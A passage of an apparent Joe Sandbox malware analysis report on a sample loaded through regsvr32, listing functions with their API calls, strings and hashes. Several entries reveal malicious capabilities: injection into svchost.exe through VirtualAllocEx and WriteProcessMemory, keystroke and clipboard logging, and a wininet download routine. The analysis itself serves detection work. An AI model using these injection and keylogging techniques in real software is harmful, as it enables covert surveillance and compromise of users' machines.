Instruction Fuzzy Hash: DFF03A302109048FEB48EF79D8986A037A1FB9D322F548365A97ACA2F5CB754881CB55

Function 02879EC8 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 02879EDE

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
Instruction ID: 548fba2405ca45fcce85267fe2584472bfa585cbf6764252a47f72a65b9eb7ea
Opcode Fuzzy Hash: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
Instruction Fuzzy Hash: D9E092342145448BFB88AB3CEC5D7A676E1F7C8300F808829F94AC2290EF7CC0818746

Function 00007FFE0140E328 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE01424130: RtlCaptureContext.NTDLL ref: 00007FFE014241C2
Part of subcall function 00007FFE01424130: RtlUnwindEx.KERNEL32 ref: 00007FFE014241FF
Part of subcall function 00007FFE01424130: abort.MSVCRT ref: 00007FFE01424205
Part of subcall function 00007FFE01424130: RaiseException.KERNEL32 ref: 00007FFE01424242

SetFilePointerEx.KERNEL32 ref: 00007FFE0140E367
GetLastError.KERNEL32 ref: 00007FFE0140E37C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: CaptureContextErrorExceptionFileLastPointerRaiseUnwindabort
String ID:
API String ID: 664057041-0
Opcode ID: 2d0025a280a579b495930d2286001d0d54a2ef0b72e951c8eae8ee94cd007ed2
Instruction ID: 2477d90fdd25d111658dd0c109c28ae9589d4da938090437fcb0ed85a1d2a5bd
Opcode Fuzzy Hash: 2d0025a280a579b495930d2286001d0d54a2ef0b72e951c8eae8ee94cd007ed2
Instruction Fuzzy Hash: 76F0A066E197814AEB019B7190043EC7FB0EB49B84F8800A6CE4C6776ACA3CC194C301

Function 02873860 Relevance: 1.5, APIs: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 02873910

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 161731fe925641ee5099e590e89d8e6fb90fe9e2b3f0774f8ef52276d27d0ce1
Instruction ID: 604fb81f0137741dd58ed0e7b7de29e94bd7b98505b4fd9a594adf160b7ac0e4
Opcode Fuzzy Hash: 161731fe925641ee5099e590e89d8e6fb90fe9e2b3f0774f8ef52276d27d0ce1
Instruction Fuzzy Hash: 04816B34618E0A9FDB88EB38C4457A5F7E1FB58305F508269E49EC3255DB34E8A5CBC2

Function 00007FFE013EA430 Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE013EA4F8

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a656798fd566d256c0ce5710320f8422d3e48f1eec68ac884756cd555b4fe646
Instruction ID: 7d7ca329c41556ead4590de60f0637820ccbbd4507d6012b536e6b60601e34f0
Opcode Fuzzy Hash: a656798fd566d256c0ce5710320f8422d3e48f1eec68ac884756cd555b4fe646
Instruction Fuzzy Hash: B021C362B1874681EB24CB16E9046A9A776FF55BD4F498032DE4D1B7B5DF3CE181C300

Function 00007FFE014380F0 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FFE01438156

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 39cc25f1d1592ec38f97d23f592d6d99dd08ca8d11843fbf3b6c1325d5cfbae2
Instruction ID: 1172a38244b51838ff773fc78e1fd96786351160ce9ed10ee9fc830ccaa93d47
Opcode Fuzzy Hash: 39cc25f1d1592ec38f97d23f592d6d99dd08ca8d11843fbf3b6c1325d5cfbae2
Instruction Fuzzy Hash: 45212972A0970385EB658F29984436977A0EB45718F298734EA1C4A3F4DB7D9984C780

Function 00007FFE01417035 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE01417C90: GetCurrentProcessId.KERNEL32 ref: 00007FFE01417CF0
Part of subcall function 00007FFE01417C90: ProcessPrng.BCRYPTPRIMITIVES ref: 00007FFE01417D1C
Part of subcall function 00007FFE01417C90: HeapFree.KERNEL32 ref: 00007FFE01417DC7

CloseHandle.KERNEL32 ref: 00007FFE0141718F

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: Process$CloseCurrentFreeHandleHeapPrng
String ID:
API String ID: 4199747799-0
Opcode ID: b3c4c02a552eac96d434e527a25307d62e42745c5ac9181eca9c226ed022625f
Instruction ID: faa845cdc87708a113fc48d7d0804a28bc2a3eb537fa4ab0ba56ae88e21a78c0
Opcode Fuzzy Hash: b3c4c02a552eac96d434e527a25307d62e42745c5ac9181eca9c226ed022625f
Instruction Fuzzy Hash: DFF05E2360468585E7A18F25E9003AD7295AB44FE9F188431DE1C4BBF9CE3CE8C3C300

Non-executed Functions

Function 02E48EC0 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 202libraryloaderprocessCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32 ref: 02E48F4B
CreateProcessA.KERNEL32 ref: 02E48FAE
OpenProcess.KERNEL32 ref: 02E48FD3
LoadLibraryA.KERNEL32 ref: 02E49001
GetProcAddress.KERNEL32 ref: 02E49011
LoadLibraryA.KERNEL32 ref: 02E49022
GetProcAddress.KERNEL32 ref: 02E49032
LoadLibraryA.KERNEL32 ref: 02E49043
GetProcAddress.KERNEL32 ref: 02E49053
LoadLibraryA.KERNEL32 ref: 02E49064
GetProcAddress.KERNEL32 ref: 02E49074
GetCurrentProcess.KERNEL32 ref: 02E4907E
GetProcessId.KERNEL32 ref: 02E49087
GetModuleFileNameA.KERNEL32 ref: 02E490BB
VirtualAllocEx.KERNEL32 ref: 02E490F1
WriteProcessMemory.KERNEL32 ref: 02E49114

Strings

@, xrefs: 02E49165
WaitForSingleObject, xrefs: 02E4906A
ExitProcess, xrefs: 02E49028
h, xrefs: 02E48F2B
Kernel32.dll, xrefs: 02E48FFA, 02E49017, 02E49038, 02E49059
Windows\System32\svchost.exe, xrefs: 02E48F51
%s%s, xrefs: 02E48F5F
WinExec, xrefs: 02E49049
OpenProcess, xrefs: 02E49007

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process$AddressLibraryLoadProc$AllocCreateCurrentDirectoryFileMemoryModuleNameOpenSystemVirtualWrite
String ID: %s%s$@$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\System32\svchost.exe$h
API String ID: 675209239-4110464286
Opcode ID: 0a9a7cb759e9cd70e4e7ad241d6db3e1b1dac7647f357b7e36e456aaf75e7cd7
Instruction ID: c8c1ed88245b531543e09f7c978c3d76917bb85f94f4a3de181bfed75355dd63
Opcode Fuzzy Hash: 0a9a7cb759e9cd70e4e7ad241d6db3e1b1dac7647f357b7e36e456aaf75e7cd7
Instruction Fuzzy Hash: 57914931254B8186EB20DF62F81C79A73A5F799B88F805125DE4E17B68EF3CC249CB50

Function 02E52000 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 223stringclipboardsleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 02E52088
GetTickCount.KERNEL32 ref: 02E5208E
GetTickCount.KERNEL32 ref: 02E520A5
OpenClipboard.USER32 ref: 02E520B3
GetClipboardData.USER32 ref: 02E520BE
GlobalSize.KERNEL32 ref: 02E520D3
GlobalLock.KERNEL32 ref: 02E520E0
wsprintfW.USER32 ref: 02E5213E
GlobalUnlock.KERNEL32 ref: 02E52163
CloseClipboard.USER32 ref: 02E52170
GetKeyState.USER32 ref: 02E52205
lstrlenW.KERNEL32 ref: 02E5225F
lstrlenW.KERNEL32 ref: 02E5227F
lstrlenW.KERNEL32 ref: 02E522A7
wsprintfW.USER32 ref: 02E522CD
wsprintfW.USER32 ref: 02E522EC
wsprintfW.USER32 ref: 02E5231F
lstrlenW.KERNEL32 ref: 02E5236D

Strings

%s%s, xrefs: 02E522D8
9, xrefs: 02E521FD
), xrefs: 02E522FE
%s%s, xrefs: 02E5230B
[esc], xrefs: 02E52075
f, xrefs: 02E52339
5, xrefs: 02E52238
), xrefs: 02E5222F
%s%s, xrefs: 02E522C0
[, xrefs: 02E5212F
5, xrefs: 02E52303

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrlenwsprintf$ClipboardGlobal$CountTick$CloseDataLockOpenSizeSleepStateUnlock
String ID: [$%s%s$%s%s$%s%s$)$)$5$5$9$[esc]$f
API String ID: 4137050888-2084089848
Opcode ID: 1b461a56441360ce845689485ed66bb0008adf4a0547f8c3c9596193dca8de7b
Instruction ID: e6e5c66cff2ef3e09723e00a26f12502ada78f60183f9323752abaade61463bd
Opcode Fuzzy Hash: 1b461a56441360ce845689485ed66bb0008adf4a0547f8c3c9596193dca8de7b
Instruction Fuzzy Hash: 7891CD352A0B9196EB14DF61F9483AA33A9F744BC8F44A025EF8E57B64DF38C145C790

Function 02E62D00 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 02E62D56
_errno.LIBCMT ref: 02E62D5D
_invalid_parameter_noinfo.LIBCMT ref: 02E62D68

Strings

U, xrefs: 02E632E4

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 933f7ccd4e57a0c3640cd29298bfcbe6b8f7dd673e4b2ab9a2227a01ddb3188f
Instruction ID: f9f94295cf770c8768fae1108bb556706b0b35d0b742b40abb28421955eca30f
Opcode Fuzzy Hash: 933f7ccd4e57a0c3640cd29298bfcbe6b8f7dd673e4b2ab9a2227a01ddb3188f
Instruction Fuzzy Hash: 9902DF326D4A8186DB208F29E44C37EB761F785BD8F54A116EF9A47B58DB3DC049CB10

Function 02E5F4E8 Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 721COMMON

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E5F55B
_invalid_parameter_noinfo.LIBCMT ref: 02E5F566
_fileno.LIBCMT ref: 02E5F59F
_errno.LIBCMT ref: 02E5F612
_invalid_parameter_noinfo.LIBCMT ref: 02E5F61D
write_multi_char.LIBCMT ref: 02E5FC07
write_multi_char.LIBCMT ref: 02E5FC39
write_multi_char.LIBCMT ref: 02E5FCDA
free.LIBCMT ref: 02E5FCF2
write_char.LIBCMT ref: 02E5FE45
write_char.LIBCMT ref: 02E5FE70

Strings

@, xrefs: 02E5F58B
, xrefs: 02E5FBD7

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
String ID: $@
API String ID: 1084558760-1077428164
Opcode ID: ec179a5fd378d13b2d58a736491d49f451d9c3920d36331e28fa716487c53895
Instruction ID: 7eec543517343454f30406dc077a1e005e753f6fbd953cdb8b3abeb227446c9c
Opcode Fuzzy Hash: ec179a5fd378d13b2d58a736491d49f451d9c3920d36331e28fa716487c53895
Instruction Fuzzy Hash: C44236726B8AB086DF258B68E5543AE6B61F78779CF24F416DF4A47E64CB38C440CB01

Function 02E5C870 Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 705COMMON

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E5C8DE
_invalid_parameter_noinfo.LIBCMT ref: 02E5C8E9
_fileno.LIBCMT ref: 02E5C921
_errno.LIBCMT ref: 02E5C992
_invalid_parameter_noinfo.LIBCMT ref: 02E5C99D
write_multi_char.LIBCMT ref: 02E5CF6A
write_multi_char.LIBCMT ref: 02E5CF9C
write_multi_char.LIBCMT ref: 02E5D048
free.LIBCMT ref: 02E5D061
write_char.LIBCMT ref: 02E5D1A0
write_char.LIBCMT ref: 02E5D1C1

Strings

@, xrefs: 02E5C90D
, xrefs: 02E5CF3A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
String ID: $@
API String ID: 1084558760-1077428164
Opcode ID: 777b2bbc50e84923bb68a82086348877efee093c21b5f3dd8466455b5af6995b
Instruction ID: 5bbacec71156c9828597d94ebb3b874577c334ce8e4350c612f31538189d94e0
Opcode Fuzzy Hash: 777b2bbc50e84923bb68a82086348877efee093c21b5f3dd8466455b5af6995b
Instruction Fuzzy Hash: F74226722B8BB085DB25CB29D9643AE6B61F74578CF28F407DF4A47A64CB78C441CB40

Function 02E49460 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 123libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 02E494A7
GetProcAddress.KERNEL32 ref: 02E494BA
FreeLibrary.KERNEL32 ref: 02E494E6
GetProcAddress.KERNEL32 ref: 02E494FD
CreateFileW.KERNEL32 ref: 02E49546
GetProcAddress.KERNEL32 ref: 02E4958C
WriteFile.KERNEL32 ref: 02E495CD
CloseHandle.KERNEL32 ref: 02E495E2
Sleep.KERNEL32 ref: 02E495F5
GetProcAddress.KERNEL32 ref: 02E49605
FreeLibrary.KERNEL32 ref: 02E49620

Strings

InternetOpenUrlW, xrefs: 02E494F3
InternetReadFile, xrefs: 02E49582
InternetOpenW, xrefs: 02E494AD
MSIE 6.0, xrefs: 02E494C0
InternetCloseHandle, xrefs: 02E495FB
wininet.dll, xrefs: 02E4948A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite
String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 2977986460-1099148085
Opcode ID: 3bed2e3fed1dd97c3597bc5c297f86b790980d851acd740cd57b361686804748
Instruction ID: 662a039c67d82f0ad46690c408a3f79fd5be6a3a627c32c439015156c4f85660
Opcode Fuzzy Hash: 3bed2e3fed1dd97c3597bc5c297f86b790980d851acd740cd57b361686804748
Instruction Fuzzy Hash: 5D41A022248AC182EB209F52F95876BB3B1F789BE9F445121DE5A17F55DF3CC145CB10

Function 028B7ADD Relevance: 29.4, APIs: 1, Strings: 15, Instructions: 1376COMMON

Download Yara Rule

APIs

_wcsrev.LIBCMT ref: 028B7B1E

Strings

|, xrefs: 028B7BED
|, xrefs: 028B85AD
|, xrefs: 028B7CCD
|, xrefs: 028B841D
|, xrefs: 028B7EDD
|, xrefs: 028B7DAD
|, xrefs: 028B81DD
|, xrefs: 028B811D
|, xrefs: 028B829D
|, xrefs: 028B867D
1, xrefs: 028B87A6
|, xrefs: 028B7F9D
|, xrefs: 028B805D
|, xrefs: 028B877D
|, xrefs: 028B835D

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _wcsrev
String ID: 1$|$|$|$|$|$|$|$|$|$|$|$|$|$|
API String ID: 257396323-483243098
Opcode ID: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
Instruction ID: c8d3a4a6dc24876f2a1766987b4d173e2432237fd728fcb9abb569c150eddb7a
Opcode Fuzzy Hash: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
Instruction Fuzzy Hash: 82827D3C765E198BDB2E6F2899842F973A5FB9130AB44C53DC487C3266DF7484878B81

Function 02E66254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E6626F

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

GetUserDefaultLCID.KERNEL32 ref: 02E6636F
GetLocaleInfoW.KERNEL32 ref: 02E663D3
IsValidCodePage.KERNEL32 ref: 02E66445
IsValidLocale.KERNEL32 ref: 02E6645B
GetLocaleInfoA.KERNEL32 ref: 02E664D5
GetLocaleInfoA.KERNEL32 ref: 02E664F2
_itow_s.LIBCMT ref: 02E66510

Strings

Norwegian-Nynorsk, xrefs: 02E66496
ACP, xrefs: 02E6639C
OCP, xrefs: 02E663AF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Locale$Info$Valid$CodeDefaultPageUser_amsg_exit_getptd_itow_s
String ID: ACP$Norwegian-Nynorsk$OCP
API String ID: 1236750932-4064345498
Opcode ID: 1f16e3efabc551431a5c0578b677a8b35f1afe1a9ab028db14e8eca5c82f04ed
Instruction ID: 80050a9656912784c9b6bfd3f382d5c25394061e74d8b4d7638a232c9eae4d8f
Opcode Fuzzy Hash: 1f16e3efabc551431a5c0578b677a8b35f1afe1a9ab028db14e8eca5c82f04ed
Instruction Fuzzy Hash: 7E71A9722E078186EB259F21E45C3B9776AFB84BCCF08E426DE4A47A98DB7CC445C710

Function 02E51BF0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121synchronizationfilekeyboardCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 02E51C2D
lstrcatW.KERNEL32 ref: 02E51C3D
CreateMutexW.KERNEL32 ref: 02E51C4A
WaitForSingleObject.KERNEL32 ref: 02E51C5D
CreateFileW.KERNEL32 ref: 02E51C8B
GetFileSize.KERNEL32 ref: 02E51C99
CloseHandle.KERNEL32 ref: 02E51CA4
DeleteFileW.KERNEL32 ref: 02E51CB5
ReleaseMutex.KERNEL32 ref: 02E51CC2
DirectInput8Create.DINPUT8 ref: 02E51CE3
GetTickCount.KERNEL32 ref: 02E51D9B
GetKeyState.USER32 ref: 02E51DAC

Strings

\DisplaySessionContainers.log, xrefs: 02E51C33
<, xrefs: 02E51D66

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
String ID: <$\DisplaySessionContainers.log
API String ID: 1095970075-1170057892
Opcode ID: a7707feeb2605cd531d5f7e39eeb4ae4399d5209c77fcb40601b151f21c5fa34
Instruction ID: 4d57ab9b516c2b6e54c695dc01bc84485f74361ee70d7df115f4e7be56aa6152
Opcode Fuzzy Hash: a7707feeb2605cd531d5f7e39eeb4ae4399d5209c77fcb40601b151f21c5fa34
Instruction Fuzzy Hash: 49514675394A8586EB14CF66F85C79A3764FB88B89F809016DE8E4BB25CF3DC049CB40

Function 02E4F520 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143stringprocessCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 02E4F5B3
lstrlenW.KERNEL32 ref: 02E4F5D5
wsprintfW.USER32 ref: 02E4F631
ExpandEnvironmentStringsW.KERNEL32 ref: 02E4F698
lstrcatW.KERNEL32 ref: 02E4F6D3
lstrcatW.KERNEL32 ref: 02E4F6E0
lstrcpyW.KERNEL32 ref: 02E4F6EE
CreateProcessW.KERNEL32 ref: 02E4F75D

Strings

, xrefs: 02E4F5C2
WinSta0\Default, xrefs: 02E4F710
%s\shell\open\command, xrefs: 02E4F623
"%1, xrefs: 02E4F69E
h, xrefs: 02E4F704

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrcatlstrlen$CreateEnvironmentExpandProcessStringslstrcpywsprintf
String ID: $"%1$%s\shell\open\command$WinSta0\Default$h
API String ID: 1783372451-2159495357
Opcode ID: 753f1e88c2c9bcdca436a99e464efae067fe74ee41da2aa91f75f24b88240b9b
Instruction ID: 78a74d35add3e49deafbcddbbf273bb7523f926340f9372163f0ed915d79ad0a
Opcode Fuzzy Hash: 753f1e88c2c9bcdca436a99e464efae067fe74ee41da2aa91f75f24b88240b9b
Instruction Fuzzy Hash: 1851A172360A9595EF20DF65E8587E97365FB8878CF809025DE0E47E68EF78C205CB50

Function 0287E1C0 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 704COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0287E216
_errno.LIBCMT ref: 0287E21D
_invalid_parameter_noinfo.LIBCMT ref: 0287E228

Strings

U, xrefs: 0287E7A4

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: fd271239539acf2b13b727adbdf7d8bf5a9ea02c1789f650ce691eb56d9289ff
Instruction ID: e4b195b4a2641c6738d159b0e69833498d3d6c04f485f613192a7d61413c2c6f
Opcode Fuzzy Hash: fd271239539acf2b13b727adbdf7d8bf5a9ea02c1789f650ce691eb56d9289ff
Instruction Fuzzy Hash: D022083D218A498BD719DF6CC8857BA73E2FB95714F14066DE88BC3291DB34D442CB82

Function 028BE8CD Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 704COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 028BE923
_errno.LIBCMT ref: 028BE92A
_invalid_parameter_noinfo.LIBCMT ref: 028BE935

Strings

U, xrefs: 028BEEB1

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: a53fb3a3fee9462e519b52e12cf248d97590bd87bcb355640138ed9d24c52b54
Instruction ID: 685a2c32a30eb9a9957f273f7bef5c9601cc575faa73133b1b2f97ccecf6bd3d
Opcode Fuzzy Hash: a53fb3a3fee9462e519b52e12cf248d97590bd87bcb355640138ed9d24c52b54
Instruction Fuzzy Hash: 5622D439218A498FE71A9F28C8457EA77E1FF95705F94061DE88BC3351DB34E446CB82

